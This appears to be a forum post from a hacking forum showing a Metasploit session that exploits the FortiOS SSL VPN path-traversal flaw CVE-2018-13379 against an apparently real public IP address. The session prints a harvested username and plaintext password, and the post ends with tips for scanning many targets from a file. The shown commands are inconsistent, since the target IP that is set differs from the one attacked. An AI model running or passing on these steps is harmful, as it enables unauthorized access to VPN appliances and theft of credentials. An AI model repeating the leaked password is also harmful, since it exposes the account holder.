this was great help, may i contact you off site? i see you have no contact info provided.Код:user@host:~$ msfconsole StArting the Metasploit Framework console...Код:msf6 > search CVE-2018-13379 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/gather/fortios_vpnssl_traversal_creds_leak normal No FortiOS Path Traversal Credential Gatherer Interact with a module by name or index. For example info 0, use 0 or use auxiliary/gather/fortios_vpnssl_traversal_creds_leakКод:msf6 > use 0 msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) >Код:msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > set rhosts 110.141.231.191 rhosts => 110.141.231.191Код:msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > run [*] https://46.18.171.34:10443 - Trying to connect. [+] https://46.18.171.34:10443 - Vulnerable! [+] https://46.18.171.34:10443 - File saved to /home/ubuntu/.msf4/loot/20230602185931_default_46.18.171.34__715108.txt [+] https://46.18.171.34:10443 - 1 credential(s) found! [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completedКод:msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > creds Credentials =========== host origin service public private realm private_type JtR Format ---- ------ ------- ------ ------- ----- ------------ ---------- 46.18.171.34 46.18.171.34 10443/tcp (https) sean 77lillandslanebrighousecomputers Password
You can improve this by changingRPORTand usingset RHOSTS file:targets.txt. For creds to work just do:sudo systemctl start postgresql,msfdb init.
https://xss.pro/threads/83327/post-622477